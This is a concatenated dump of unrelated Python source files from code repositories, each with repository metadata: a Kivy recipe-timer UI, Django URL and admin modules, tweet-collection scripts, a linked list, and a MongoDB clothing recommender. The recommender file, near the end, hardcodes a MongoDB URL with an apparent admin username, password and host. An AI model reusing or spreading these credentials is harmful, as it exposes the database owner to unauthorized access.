on_insideimgsize(child, *args):\n child.canvas.clear()\n with child.canvas:\n Color(1,1,1,1)\n Rectangle(source = child.source, size = child.insideimgsize, pos = (32 - child.insideimgsize[0]/2, 47 - child.insideimgsize[1]/2 ))\n\n \n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n \n relativelayoutgrid = GridLayout(rows = 1, spacing = dp(16))\n \n for i in range(18): relativelayoutgrid.add_widget(this.NewChooserItem(source = asset + \"bread.png\"))\n \n scrollrelativelayout = RelativeLayout(size_hint_x = None, width = 1500); scrollrelativelayout.add_widget(relativelayoutgrid); scrollrelativelayout.add_widget(this.TopChooserTimericon())\n scroll = ScrollView(bar_color = (1,1,1,0),bar_inactive_color = (1,1,1,0)); scroll.add_widget(scrollrelativelayout)\n this.add_widget(scroll)\n \n def NewChooserItem(this, **kwargs): \n TopChooseritem = this.TopChooserItem(**kwargs)\n TopChooseritem.bind(on_release = lambda z:Animation(x = z.x , d = 1, t = 'out_back').start(this.children[0].children[0].children[0]))\n \n return TopChooseritem\n \nclass Tag(RelativeLayout):\n def __init__(self, **kwargs):\n super().__init__()\n self.size_hint_y = kwargs[\"size_hint_y\"]\n self.size_hint_x = None\n self.height = kwargs[\"height\"]\n self.width = dp(64+8)\n with self.canvas:\n Color(1.0, 0.5, 0.875, 1.0)\n RoundedRectangle(size = (dp(64), dp(24)), pos = (4,0))\n self.label = Label(text = kwargs[\"tag_text\"], markup = True ,size_hint = (None,None),size = (dp(64), dp(24)), pos = (0,0))\n self.add_widget(self.label)\nclass BottomNavigator(GridLayout):\n rows = 1\n height = NumericProperty(dp(64))\n width = NumericProperty(0)\n size_hint_x = NumericProperty(None)\n backcolor1 = ListProperty([.1,.1,.1,1])\n backcolor2 = ListProperty([.11,.11,.11,1])\n opened = BooleanProperty(False)\n class BottomNavigatorItem(ButtonBehavior,RelativeLayout):\n cols = 1\n opacity = NumericProperty(.96)\n opened = BooleanProperty(False)\n class Layer1(RelativeLayout):\n def __init__(child, **kwargs):\n super().__init__()\n \n with child.canvas:\n Color(1.0, 0.5, 0.875, 1.0)\n RoundedRectangle(size = (dp(64), dp(24)), pos = (Window.width*.725 - dp(32), dp(64)*.30 - dp(12)))\n child.label = Label(text = kwargs[\"tag_text\"], markup = True ,size_hint = (None,None),size = (dp(64), dp(24)), pos = (Window.width*.725 - dp(32), dp(64)*.30 - dp(12)))\n child.add_widget(child.label)\n \n \n \n def __init__(child, **kwargs):\n super().__init__()\n child.SmallLabel = Label(text = kwargs[\"text\"], text_size = (Window.width/2, dp(64)), valign = 'middle' , halign = 'left',markup = True, font_size = 18)\n child.Biglabel = Label(text = kwargs[\"timetext\"],markup = True, font_size = 30)\n insidegrid = GridLayout(rows = 1); insidegrid.add_widget(child.Biglabel); insidegrid.add_widget(child.SmallLabel)\n rootgrid = GridLayout(cols = 1); rootgrid.add_widget(insidegrid)\n \n child.add_widget(rootgrid)\n for tagtext in kwargs[\"tags\"]:\n child.add_widget(child.Layer1(tag_text = tagtext))\n \n \n child.bind(on_release = lambda x: child.switch())\n def switch(child,*args):\n if child.opened == True: \n child.close()\n child.opened = False\n elif child.opened == False: \n child.open()\n child.opened = True\n def open(child,*args):\n print(\"PROBANDO\")\n child.Biglabel.text = child.Biglabel.text.replace(\"ffffff\",\"000000\")\n child.SmallLabel.text = child.SmallLabel.text.replace(\"ffffff\",\"000000\")\n \n def close(child,*args):\n print(\"PROBANDO\")\n child.Biglabel.text = child.Biglabel.text.replace(\"000000\",\"ffffff\")\n child.SmallLabel.text = child.SmallLabel.text.replace(\"000000\",\"ffffff\")\n \n def __init__(this, **kwargs): \n super().__init__(**kwargs)\n\n this.add_widget(this.BottomNavigatorItem(timetext = \"[color=#ffffff]00M'00S\",tags = [\"tag\"], text = \"[color=#ffffff]Nueva Receta\\n[/size][size=16sp][color=#898989ff]Autor[/color]\"))\n for i in range(5): this.add_widget(this.BottomNavigatorItem(timetext = \"[color=#ffffff]11M'30S\",tags = [\"Puerco\"], text = \"[color=#ffffff]Titulo de Receta\\n[/size][size=16sp][color=#898989ff]Autor[/color]\"))\n for children in this.children: this.width += Window.width\n with this.canvas.before:\n Color(1,1,1,1)\n Rectangle(size = (this.size[0]*1.5, this.size[1]) , pos = (-(this.size[0]*0.25), 0), texture = Gradient.vertical((.1,.1,.1,1),(.11,.11,.11,1)))\n def on_backcolor1(this,*args):\n this.canvas.before.clear()\n with this.canvas.before:\n Color(1,1,1,1)\n Rectangle(size = (this.size[0]*1.5, this.size[1]) , pos = (-(this.size[0]*0.25), 0), texture = Gradient.vertical((this.backcolor1[0],this.backcolor1[1],this.backcolor1[2],this.backcolor1[3]),(this.backcolor2[0],this.backcolor2[1],this.backcolor2[2],this.backcolor2[3])))\n \n def switch(this,*args):\n if this.opened == True: \n this.close()\n this.opened = False\n elif this.opened == False: \n this.open()\n this.opened = True\n def open(this,*args):\n print (\"a\")\n Animation(backcolor1 = [1,1,1,1], backcolor2 = [.99,.99,.99,1], d = .5 , t ='out_circ').start(this)\n \n def close(this,*args):\n print (\"a\")\n Animation(backcolor1 = [.1,.1,.1,1], backcolor2 = [.11,.11,.11,1], d = .5 , t ='out_circ').start(this)\n \n\n\n \nclass Keyboard(GridLayout):\n cols = 1\n size_hint_y = NumericProperty(None)\n state = BooleanProperty(False)\n height = NumericProperty(dp(54)*4)\n padding = [dp(33),0,dp(33),0]\n print((Window.width - 33)/ 3.0 , \"ALINIACION\",\"@Keyboard\")\n CurrentAnimation = None\n \n \n class Key(ButtonBehavior,RelativeLayout):\n insideimgsize = ListProperty([dp(15),dp(32)])\n opacity = NumericProperty(1)\n strk = StringProperty(\"\")\n source = StringProperty(\"\")\n animationellipsesize = ListProperty([dp(0),dp(0)])\n animationellipseopacity = NumericProperty(1)\n animationellipsecolor = ListProperty([.91,.91,.91])\n def __init__(child,**kwargs):\n super().__init__(**kwargs)\n \n \n child.paper = RelativeLayout(size_hint = (None,None),pos_hint = {'center_x':.5, 'center_y':.5}, size = (dp(15),dp(30)))\n \n child.add_widget(child.paper)\n \n \n \n with child.paper.canvas:\n Color(child.animationellipsecolor[0],child.animationellipsecolor[1],child.animationellipsecolor[2],child.animationellipseopacity)\n Ellipse(size = child.animationellipsesize, pos = (dp(15)/2 - child.animationellipsesize[0]/2, dp(30)/2 - child.animationellipsesize[1]/2))\n \n Color(1,1,1,1)\n Rectangle(size = child.insideimgsize, source = child.source, pos = (dp(15)/2 - child.insideimgsize[0]/2, dp(30)/2 - child.insideimgsize[1]/2 ))\n \n child.bind(on_release = lambda x: child.animation())\n \n def on_animationellipsesize(child, *args):\n child.paper.canvas.clear()\n with child.paper.canvas:\n Color(child.animationellipsecolor[0],child.animationellipsecolor[1],child.animationellipsecolor[2],child.animationellipseopacity)\n Ellipse(size = child.animationellipsesize, pos = (dp(15)/2 - child.animationellipsesize[0]/2, dp(30)/2 - child.animationellipsesize[1]/2))\n Color(1,1,1,1)\n Rectangle(size = child.insideimgsize, source = child.source, pos = (dp(15)/2 - child.insideimgsize[0]/2, dp(30)/2 - child.insideimgsize[1]/2 ))\n \n def animation(child,*args):\n Animation.stop_all(child, 'animationellipseopacity')\n child.animationellipseopacity = 1\n child.animationellipsesize = (0,0)\n x = Animation(animationellipsesize = (dp(64),dp(64)), animationellipseopacity = 0, d = .5 , t = 'out_quart')\n x.start(child)\n \n def on_insideimgsize(child, *args):\n child.paper.canvas.clear()\n with child.paper.canvas:\n Rectangle(size = child.insideimgsize, source = child.source, pos = (dp(15)/2 - child.insideimgsize[0]/2, dp(30)/2 - child.insideimgsize[1]/2 ))\n \n def __init__(this, **kwargs):\n super().__init__(**kwargs)\n \n grid = GridLayout(cols = 3)\n \n for i in range(9): grid.add_widget(this.Key(source = asset + str(i+1) + \".png\", strk = str(i+1)))\n \n grid.add_widget(Widget())\n grid.add_widget(this.Key(source = asset + str('0') + \".png\", strk = str(0)))\n grid.add_widget(Widget())\n this.add_widget(grid)\n \n this.y = (dp(54)*-4)\n this.opacity = 0\n \n def switch(this, *args):\n this.prepare()\n if this.state == True:\n this.CurrentAnimation = Animation(y = dp(64 + 16), opacity = 0, d = .25 , t = 'out_quart') + Animation(y = -(this.height), d = 0.25/4 , t = 'out_expo')\n this.CurrentAnimation.start(this)\n this.state = False\n else:\n this.y = dp(64 + 16)\n this.opacity = 0\n this.CurrentAnimation = Animation(y = dp(64 + 16), opacity = 1, d = .25 , t = 'out_back')\n this.CurrentAnimation.start(this)\n this.state = True\n \n def prepare(this,*args):\n try:\n this.CurrentAnimation.cancel()\n print(\"Canceled.\")\n except:\n print(\"There is no Currentanimation to cancel.\")\n \n \n \nclass Layer1(RelativeLayout):\n typingstateopacity = NumericProperty(1)\n typestateopacity = NumericProperty(1)\n typestate = BooleanProperty(False)\n \n class LockedStateButton(ButtonBehavior, RelativeLayout):\n source = StringProperty(asset + \"lock0.png\")\n xscale = NumericProperty(1.0)\n \n def __init__(child,**kwargs):\n super().__init__(**kwargs)\n with child.canvas: \n Color(1,1,1,1)\n Rectangle(source = child.source, size = (dp(50),dp(50)))\n \n child.bind(on_release = lambda x: child.Animatesize())\n \n def on_xscale(child,*args):\n print (child.xscale)\n child.canvas.clear()\n xsize = dp(50)*child.xscale,dp(50)*child.xscale\n with child.canvas: \n Color(1,1,1,1)\n Rectangle(source = child.source, size = xsize , pos = (dp(50)/2 - xsize[0]/2,dp(50)/2 - xsize[1]/2))\n \n \n def Animatesize(child,*args):\n print(\"animating\")\n try:\n if child.source == asset + \"lock0.png\":\n child.source = asset + \"lock1.png\"\n elif child.source == asset + \"lock1.png\" :\n child.source = asset + \"lock0.png\"\n except:\n pass\n\n child.xscale = 1.0\n anim1 = Animation(xscale = .75, d = .05,t = \"in_circ\")\n anim2 = Animation(xscale = 1.0, d = .15,t = \"out_circ\")\n anim = anim1 + anim2\n anim.start(child)\n \n \n \n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n \n grid = GridLayout(cols = 1);\n \n this.add_widget(grid);\n \n Space0 = Widget(size_hint_y = None , height = dp(16))\n Space1 = Widget(size_hint_y = None , height = dp(32-15))\n Space2 = Widget(size_hint_y = None , height = dp(64))\n Space3 = Widget(size_hint_y = None , height = dp(64))\n \n locksize = (dp(50),dp(50))\n this.lock = this.LockedStateButton(pos = (Window.width*.9 - (locksize[0]/2), dp(94) - (locksize[1]/2)))\n Topchooserlayer = RelativeLayout(height = dp(94), size_hint_y = None)\n this.Displaylayer = RelativeLayout(height = dp(94), size_hint_y = None); this.Displaylayer.add_widget(this.lock)\n \n grid.add_widget(Topchooserlayer);\n grid.add_widget(Space2);\n grid.add_widget(this.Displaylayer);\n\n \n \n with this.Displaylayer.canvas:\n Color(1,1,1,this.typestateopacity)\n Rectangle(group = 'a',source = asset + \"typing.png\", size = (locksize), pos = (Window.width*.8 - (locksize[0]/2), dp(94) - (locksize[1]/2)))\n \n def on_typestateopacity(this,*args):\n \n locksize = (dp(50),dp(50))\n this.Displaylayer.canvas.remove_group('a')\n \n with this.Displaylayer.canvas:\n Color(1,1,1,this.typestateopacity)\n Rectangle(group = 'a',source = asset + \"typing.png\", size = (locksize), pos = (Window.width*.8 - (locksize[0]/2), dp(94) - (locksize[1]/2)))\n \n \n\n def switchtypestate(this,*args):\n if this.typestate == True:\n Animation(typestateopacity = 0, d = .5, t = 'out_circ').start(this)\n this.typestate = False\n else:\n Animation(typestateopacity = 1, d = .5, t = 'out_circ').start(this)\n this.typestate = True\n \n \nclass MainActivitie(RelativeLayout):\n CurrentAnimation = None\n \n class Layer2(GridLayout):\n cols = NumericProperty(1)\n size_hint_y = NumericProperty(2)\n pos_hint = DictProperty({'y':-1})\n opened = BooleanProperty(False)\n backcolor = ListProperty([.1,.1,.1,1])\n def __init__(child,**kwargs):\n super().__init__()\n child.space = Widget(size_hint_y = None, height = Window.height - dp(64))\n child.add_widget(child.space)\n BottomNav = BottomNavigator()\n BottomScroll = BottomNavigatorScroll(size_hint_y = None, height = dp(64), NoItems = 6); BottomScroll.add_widget(BottomNav)\n child.add_widget(BottomScroll)\n child.pizzarra = RelativeLayout(size_hint_y = None, height = Window.height )\n child.newcanvas = Widget()\n child.pizzarra.add_widget(child.newcanvas)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n container = GridLayout(rows = 1, size_hint_y = None, height = dp(36));container.add_widget(Label());container.add_widget(especialbutton());container.add_widget(Label())\n facecanvas = RelativeLayout(size_hint_y = None, height = dp(64+16)*1.5)\n tagsgrid = GridLayout(rows = 1, size_hint_y = None, height = dp(24))\n tagsgrid.add_widget(Widget())\n tagsgrid.add_widget(Tag(tag_text = \"Tag1\", size_hint_y = None, height = dp(24)))\n tagsgrid.add_widget(Tag(tag_text = \"Tag2\", size_hint_y = None, height = dp(24)))\n tagsgrid.add_widget(Tag(tag_text = \"Tag3\", size_hint_y = None, height = dp(24)))\n tagsgrid.add_widget(Tag(tag_text = \"Tag4\", size_hint_y = None, height = dp(24)))\n tagsgrid.add_widget(Widget())\n\n grid = GridLayout(cols = 1, opacity = 0)\n grid.add_widget(Widget(size_hint_y = None, height = dp(16)))\n grid.add_widget(Label(text = \"[size=24][color=#000000]Nueva Receta\", markup = True, size_hint_y = None, height = dp(24)))\n grid.add_widget(Widget(size_hint_y = None, height = dp(8)));grid.add_widget(tagsgrid)\n grid.add_widget(facecanvas)\n grid.add_widget(Widget(size_hint_y = None, height = dp(8)));grid.add_widget(container);grid.add_widget(Widget(size_hint_y = None, height = dp(8)))\n \n grid.add_widget(Label(text = \"[size=16][color=#000000]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\\n \\n.\\n.\\n.\\n.\\n \\n.\\n.\\n.\\n.\\n.\",text_size = (Window.width*.8, dp(64*4)), halign = 'justify', valign = 'top', markup = True, size_hint_y = None, height = dp(64*4)))\n \n \n \n \n child.pizzarra.add_widget(grid)\n child.add_widget(child.pizzarra)\n child.newcanvas.canvas.clear()\n with child.newcanvas.canvas:\n Color(child.backcolor[0],child.backcolor[1],child.backcolor[2],child.backcolor[3])\n Rectangle(size = (Window.width, Window.height), group = \"color\")\n \n facecanvas.canvas.clear()\n with facecanvas.canvas:\n Color(.89,.89,.89,1)\n Ellipse(size = (64*1.5,64*1.5), pos = (Window.width/2 - 32*1.5, 8))\n \n for children in BottomScroll.children[0].children:\n children.bind(on_release = lambda x: child.switch())\n children.bind(on_release = lambda x: BottomNav.switch())\n print (children)\n \n child.grid = grid\n \n def say_hello(child,*args): print (\"hola\")\n def on_backcolor(child,*args):\n child.newcanvas.canvas.remove_group(\"color\")\n with child.newcanvas.canvas:\n Color(child.backcolor[0],child.backcolor[1],child.backcolor[2],child.backcolor[3])\n Rectangle(size = (Window.width, Window.height), group = \"color\")\n \n \n def switch(child):\n if child.opened == True: \n child.close()\n child.opened = False\n elif child.opened == False: \n child.open()\n child.opened = True\n \n print (child.opened)\n def open(child):\n Animation(height = Window.height , d = .5 , t ='out_quart').start(child.space)\n Animation(pos_hint = {'y':0} , d = .5 , t ='out_cubic').start(child)\n Animation(backcolor = [1,1,1,1] , d = .5 , t ='out_cubic').start(child)\n Animation(opacity = .54 , d = .25 , t ='out_cubic').start(child.parent.children[-1])\n (Animation(opacity = 0 , d = .25 , t ='out_cubic')+Animation(opacity = 1 , d = .5 , t ='out_cubic')).start(child.grid)\n \n def close(child):\n Animation(height = Window.height - dp(64) , d = .5 , t ='out_quart').start(child.space)\n Animation(pos_hint = {'y':-1} , d = .5 , t ='out_quart').start(child)\n Animation(backcolor = [.11,.11,.11,1] , d = .5 , t ='out_cubic').start(child)\n Animation(opacity = 1 , d = .5 , t ='out_cubic').start(child.parent.children[-1])\n \n (Animation(opacity = 0 , d = .5 , t ='out_cubic')).start(child.grid)\n \n \n \n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n \n with this.canvas:\n Rectangle(size = Window.size, texture = Gradient.vertical((1,1,1,1),(.95,.95,.95,1)))\n \n \n \n Space0 = Widget(size_hint_y = None , height = dp(16))\n Space1 = Widget(size_hint_y = None , height = dp(32-15))\n Space2 = Widget(size_hint_y = None , height = dp(64))\n Space3 = Widget(size_hint_y = None , height = dp(64))\n\n grid = GridLayout(cols = 1);\n keyboard = Keyboard(y = dp(64+16))\n layer1 = Layer1()\n this.layer2 = this.Layer2()\n this.add_widget(grid); this.add_widget(keyboard); this.add_widget(layer1); this.add_widget(this.layer2)\n \n def build(buildable = True):\n this.display = Display()\n this.display.bind(on_release = lambda x: keyboard.switch()) \n this.display.bind(on_release = lambda x: layer1.switchtypestate()) \n \n grid.add_widget(TopChooser());\n grid.add_widget(Space2);\n grid.add_widget(this.display);\n grid.add_widget(Space0);\n grid.add_widget(LyricsDisplay());\n grid.add_widget(Space1);\n grid.add_widget(DisplayMenu());\n grid.add_widget(Widget())\n grid.add_widget(Widget())\n grid.add_widget(Space3);\n \n build()\n \n def shake(this,*args):\n this.CurrentAnimation = Animation(y = -4 , d = .25/2 , t = 'in_back') + Animation(y = 0 , d = .25/2 , t = 'out_back')\n this.CurrentAnimation.start(this.children[-1])\n \n \n \n \n \n\n \n \n \n\n \n \n \n \n ","repo_name":"SotoArmando/doc-pythonkivy","sub_path":"Python 3 CodiCookingTimer/docs/MainActivitie/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":29353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18971917110","text":"import unittest\nfrom tower import TowerBuilder, Tangent, DeadEnd\n\nclass Test_Tower_Build(unittest.TestCase):\n def test_tower_build(self):\n t = TowerBuilder.createTower(Tangent, 1, 'short')\n expected = 1\n self.assertEqual(t.tower_number, expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cullinap/eldorado","sub_path":"src/test_tower.py","file_name":"test_tower.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70870631453","text":"from drf_spectacular.views import SpectacularAPIView, SpectacularSwaggerView\nfrom django.urls import path\nfrom . import views\n\napp_name = 'movies'\n\nurlpatterns = [\n # 전체 영화 리스트\n path('', views.movies_list),\n # 단일 영화 정보\n path('/', views.movie_detail),\n # 장르별 영화 리스트\n path(\"/genres/\", views.movies_genre),\n # optional\n path('swagger/', SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n # search\n path('searchpage//', views.search_post, name='search_post'),\n]\n","repo_name":"iamkijun/MovieProjectSsafy","sub_path":"back-server/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23383917831","text":"# general libraries used\r\nimport sys\r\nimport pprint\r\nimport json\r\nimport re\r\nimport os\r\nimport shutil\r\nimport codecs\r\nimport time\r\n\r\n# specific libraries used\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tweepy\r\nfrom tweepy import *\r\nimport sqlite3\r\n\r\n# including the SMaSSD support files\r\nsys.path.append(\"../Classes/\")\r\nsys.path.append(\"..\")\r\nfrom smassd_functions import *\r\nfrom my_settings import *\r\n\r\n#########################################\r\n# MAIN CODE FOLLOWS\r\n#########################################\r\n\r\n# Variable definitions\r\ninputDB = \"data/data.db\"\r\noutputCSV = \"output_grid.csv\"\r\ncolumns = ['grid_lat','grid_lon','total']\r\noutput = []\r\noutput_hash = {}\r\n\r\nconn = sqlite3.connect(\"data/data.db\")\r\nc = conn.cursor()\r\nfor r in c.execute(\"\"\"SELECT lat,lon,p.lat_1,p.lon_1,p.lat_2,p.lon_2\r\n FROM tweets t, places p where t.place_id=p.id\"\"\"):\r\n grid_lat = None\r\n grid_lon = None\r\n if r[0] and r[1]:\r\n grid_lat = int(r[0] + 0.5)\r\n grid_lon = int(r[1] + 0.5)\r\n elif r[2]:\r\n if abs(r[4]-r[2]) < 2 and abs(r[5]-r[3]) < 2:\r\n grid_lat = int(((r[2] + r[4]) / 2) + 0.5)\r\n grid_lon = int(((r[3] + r[5]) / 2) + 0.5)\r\n\r\n if grid_lat is not None:\r\n key = str(grid_lat) + \"_\" + str(grid_lon)\r\n if key in output_hash:\r\n output_hash[key] += 1\r\n else:\r\n output_hash[key] = 1\r\n\r\nfor key in output_hash:\r\n (grid_lat, grid_lon) = key.split(\"_\")\r\n ret = {\r\n 'grid_lat': grid_lat,\r\n 'grid_lon': grid_lon,\r\n 'total': output_hash[key]\r\n }\r\n output.append(ret)\r\n\r\noutput_pd = pd.DataFrame(output)\r\noutput_pd.to_csv(outputCSV, index=False)\r\n","repo_name":"slwilson4/smassd","sub_path":"04-Geocodes/export_grid.py","file_name":"export_grid.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"32337685050","text":"import tweepy\n\nAPI_KEY = \"YOUR_API_KEY\"\nAPI_SECRET = \"YOUR_API_SECRET\"\nACCESS_TOKEN = \"YOUR_ACCESS_TOKEN\"\nACCESS_TOKEN_SECRET = \"YOUR_ACCESS_TOKEN_SECRET\"\n\n\nclass MyStreamListener(tweepy.StreamListener):\n def on_status(self, status):\n f = open('messages.txt', 'a')\n f.write(\"@%s, сообщение номер %s\\n %s\\n\"\n % (status.author.screen_name, status.id_str,\n status.text))\n f.close()\n print(\"@%s, сообщение номер %s\\n %s\\n\"\n % (status.author.screen_name, status.id_str,\n status.text))\n\n def on_error(self, status_code):\n if status_code == 420:\n return False\n\n def monitoring_tweets(query, api):\n GEOBOX_SAMARA_BIG = [48.9700523344, 52.7652295668, 50.7251182524, 53.6648329274]\n myStreamListener = MyStreamListener()\n myStream = tweepy.Stream(auth=api.auth,\n listener=myStreamListener)\n myStream.filter(locations=GEOBOX_SAMARA_BIG)\n\n def task3_part3(self):\n query = [\" \"]\n while True:\n try:\n auth = tweepy.OAuthHandler(API_KEY,\n API_SECRET)\n auth.set_access_token(ACCESS_TOKEN,\n ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth)\n MyStreamListener.monitoring_tweets(query, api)\n except Exception as error_msg: \\\n print(error_msg)","repo_name":"ArtemB98/SNA_LAB1","sub_path":"MyStreamListener.py","file_name":"MyStreamListener.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29989019057","text":"\ndef random(lst):\n B=[]\n for i in range(65535):\n if (i*lst[0]+1)%65535==lst[1]:\n B.append(i)\n if len(B)==1:\n return (B[0]*lst[1]+1)%65535\n else:\n return None\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"hM9eDtYLEX8GnuhFZ_9.py","file_name":"hM9eDtYLEX8GnuhFZ_9.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3822587534","text":"class LinkedListNode:\n def __init__(self):\n self.content = None\n self.id = -1\n self.next = None\n self.prev = None\n\n def set_id(self, id):\n self.id = id\n\n\nclass LinkedList:\n def __init__(self, maxlen=-1):\n '''\n initialization of the linkedlist, head does not contain any element, but head contains last element\n :return:\n '''\n self.head = LinkedListNode()\n self.tail = None\n self.size = 0\n self.currentNode = self.head\n # self.max_size = maxlen\n\n def insertAtTail(self, content, **kargs):\n node = LinkedListNode()\n node.content = content\n if 'id' in kargs:\n node.id = kargs['id']\n node.next = None\n if self.tail:\n # the list is not empty\n node.prev = self.tail\n self.tail.next = node\n else:\n self.head.next = node\n node.prev = self.head\n self.tail = node\n self.size += 1\n\n # if self.max_size!=-1 and self.size>self.max_size:\n # self.removeFromTail()\n\n return node\n\n def insertNodeAtTail(self, node):\n node.next = None\n if self.tail:\n # the list is not empty\n node.prev = self.tail\n self.tail.next = node\n else:\n self.head.next = node\n node.prev = self.head\n self.tail = node\n self.size += 1\n\n return node\n\n def insertAtHead(self, content, **kargs):\n node = LinkedListNode()\n node.content = content\n if 'id' in kargs:\n node.id = kargs['id']\n node.next = self.head.next\n if self.head.next:\n self.head.next.prev = node\n else:\n self.tail = node\n self.head.next = node\n node.prev = self.head\n self.size += 1\n return node\n\n def removeFromTail(self):\n tail = self.tail\n self.tail.prev.next = None\n temp = self.tail.prev\n self.tail.prev = None\n self.tail = temp\n self.size -= 1\n return tail.content\n\n def removeFromHead(self):\n if not self.head.next:\n # no node in the list\n raise RuntimeError(\"there is no element in the list, cannot removeFromHead\")\n headContent = self.head.next.content\n temp = self.head.next.next\n if temp:\n # more than one element in the original list\n self.head.next.prev = None\n self.head.next.next = None\n self.head.next = temp\n temp.prev = self.head\n else:\n # there is only one element in the original list, after remove, there will be no element\n del self.head.next\n self.head.next = None\n self.tail = None\n self.size -= 1\n return headContent\n\n def moveNodeToHead(self, node):\n if self.head.next != node:\n node.prev.next = node.next\n if node.next:\n node.next.prev = node.prev\n else:\n self.tail = node.prev\n\n node.next = self.head.next\n self.head.next.prev = node\n self.head.next = node\n node.prev = self.head\n\n def removeNode(self, node):\n node.prev.next = node.next\n if self.tail == node:\n self.tail = node.prev\n else:\n node.next.prev = node.prev\n self.size -= 1\n return node\n\n def moveNodeToTail(self, node):\n if self.tail != node:\n node.prev.next = node.next\n node.next.prev = node.prev\n node.prev = self.tail\n self.tail.next = node\n node.next = None\n self.tail = node\n\n def set_node_id(self, node, id):\n node.id = id\n\n def getHeadContent(self):\n return self.head.next.content\n\n def getTailContent(self):\n return self.tail.content\n\n def __iter__(self):\n self.currentNode = self.head\n return self\n\n def next(self):\n return self.__next__()\n\n def __next__(self): # Python 3\n if self.currentNode.next == None:\n # self.currentNode = self.head\n raise StopIteration\n else:\n self.currentNode = self.currentNode.next\n return self.currentNode\n\n def __repr__(self):\n return \"linked list\"\n","repo_name":"Shureed/mimircache","sub_path":"mimircache/utils/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"41521802253","text":"from django.contrib import admin\nfrom .models import Product, Order, Basket, Address\n\n\nadmin.site.site_header = 'Shop Dashboard'\n\n\nclass ProductAdmin (admin.ModelAdmin):\n list_display = ('name', 'price', 'stock',\n 'active')\n search_fields = ('name',)\n list_filter = ('active',)\n ordering = ['name']\n actions = ['make_active', 'make_inactive']\n\n def make_active(self, request, queryset):\n rows_updated = queryset.update(active=True)\n if rows_updated == 1:\n message_bit = \"1 product was\"\n else:\n message_bit = \"%s products were\" % rows_updated\n self.message_user(request, \"%s successfully activated.\" % message_bit)\n make_active.short_description = \"Activate products\"\n\n def make_inactive(self, request, queryset):\n rows_updated = queryset.update(active=False)\n if rows_updated == 1:\n message_bit = \"1 product was\"\n else:\n message_bit = \"%s products were\" % rows_updated\n self.message_user(request, \"%s successfully deactived.\" % message_bit)\n make_inactive.short_description = \"Deactivate products\"\n\n\nclass OrderAdmin (admin.ModelAdmin):\n\n list_display = ('order_ref', 'date_time', 'total')\n search_fields = ('order_ref',)\n list_filter = ('date_time',)\n date_hierarchy = 'date_time'\n\n\nadmin.site.register(Product, ProductAdmin)\nadmin.site.register(Address)\nadmin.site.register(Order, OrderAdmin)\nadmin.site.register(Basket)\n","repo_name":"AnfalHussain/shop.api","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36568226530","text":"def run():\r\n n = int(input())\r\n a = [int(i) for i in input().split()]\r\n # res = (max(a) - min(a) + 1) - n\r\n count = 0\r\n # s = list(range(min(a),max(a)+1))\r\n # res = len(s) - len(a)\r\n for i in range(min(a),max(a)+1):\r\n if i not in a:\r\n count += 1\r\n print(count)\r\n\r\ndef main():\r\n t = int(input())\r\n for i in range(t):\r\n run()\r\nmain()","repo_name":"HieuAnh87/Python_ptit","sub_path":"Danh Sách/QuanTrong/DienSo.py","file_name":"DienSo.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"69869019612","text":"from pymongo import MongoClient\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.decomposition import TruncatedSVD\n\nmongo_url = \"mongodb://admin:ssafit@ssafit.site:8975/?authSource=admin&readPreference=primary&appname=MongoDB%20Compass&directConnection=true&ssl=false\"\n\nclient = MongoClient(mongo_url)\ndb = client['ssafit']\n\ndef cloth_helper(cloth):\n context = {\n 'newClothId': int(cloth['newClothId']),\n 'clothId': cloth['clothId'],\n 'clothName': cloth['clothName'],\n 'brand': cloth['brand'],\n 'clothImg': cloth['clothImg'],\n 'clothPrice': cloth['clothPrice'],\n 'goodsSize': cloth['goodsSize'],\n }\n return context\n\ndef get_cloth_meta(what: int):\n clothes = db.cloth_meta.find({'what': what})\n clothes = list(clothes)\n return clothes\n\ndef get_user_meta(what: int, userId: int): \n users = db.user_meta.find({'what': what})\n users = list(users)\n return users\n\ndef get_size_user_info(userId, largecategory):\n users = set()\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n exist = False\n for i in range(10):\n for one_user in db.user.aggregate([{'$match': {'largecategory': user['largecategory'], 'userHeight': {'$in': list(range(user['userHeight']-i, user['userHeight']+i))}, 'userWeight': {'$in': list(range(user['userWeight']-i, user['userWeight']+i))}}},{'$sample': {'size':1}}]):\n users.add(one_user['userId'])\n if len(users) == 3:\n exist = True\n break\n if exist:\n break\n return list(users)\n\ndef get_color_user_info(userId, largecategory):\n users = set()\n user = 